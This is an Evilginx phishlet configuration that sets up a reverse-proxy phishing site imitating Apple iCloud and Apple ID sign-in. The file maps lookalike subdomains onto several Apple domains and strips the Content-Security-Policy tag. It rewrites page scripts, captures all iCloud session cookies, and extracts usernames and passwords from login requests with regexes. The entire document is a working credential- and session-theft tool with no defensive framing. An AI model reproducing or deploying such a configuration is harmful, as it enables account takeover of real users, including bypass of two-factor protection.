author: '@charlesbel'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'icloud.com', session: true, is_landing: true}
  - {phish_sub: 'setup', orig_sub: 'setup', domain: 'icloud.com', session: true, is_landing: false}
  - {phish_sub: 'feedbackws', orig_sub: 'feedbackws', domain: 'icloud.com', session: false, is_landing: false}
  - {phish_sub: 'idmsa-icloud', orig_sub: 'idmsa', domain: 'icloud.com', session: true, is_landing: false}

  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'apple-cloudkit.com', session: false, is_landing: false}

  - {phish_sub: 'appleid', orig_sub: 'appleid', domain: 'cdn-apple.com', session: false, is_landing: false}

  - {phish_sub: 'idmsa-apple', orig_sub: 'idmsa', domain: 'apple.com', session: true, is_landing: false}
  - {phish_sub: 'www-apple', orig_sub: 'www', domain: 'apple.com', session: true, is_landing: false}

sub_filters:
  # Break the Content Security Policy html meta tag
  - {triggers_on: 'www.icloud.com', orig_sub: '', domain: 'icloud.com', search: 'Content-Security-Policy', replace: '', mimes: ['text/html']}


  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'idmsa-icloud', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: '', domain: 'icloud.com', search: '"{domain}"', replace: '"{domain}"', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'idmsa-apple', domain: 'apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'www.icloud.com', orig_sub: 'www-apple', domain: 'apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}


  - {triggers_on: 'idmsa.apple.com', orig_sub: 'www', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'setup', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'idmsa-icloud', domain: 'icloud.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'cdn', domain: 'apple-cloudkit.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'idmsa-apple', domain: 'apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'www-apple', domain: 'apple.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}


  - {triggers_on: 'appleid.cdn-apple.com', orig_sub: '', domain: '', search: '(t\.getResponseHeader\("Location"\)\))', replace: '(new URL(t.getResponseHeader("Location")).pathname))', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}



auth_tokens:
  - domain: '.icloud.com'
    keys: ['.*,regexp']
  - domain: 'www.icloud.com'
    keys: ['.*,regexp']
  - domain: 'setup.icloud.com'
    keys: ['.*,regexp']
  - domain: 'idmsa.icloud.com'
    keys: ['.*,regexp']

credentials:
  username:
    key: ''
    search: '"accountName":"([^"]*)'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)'
    type: 'json'

auth_urls:
  - '/asdasdsa/somerandom/'

login:
  domain: 'www.icloud.com'
  path: '/'
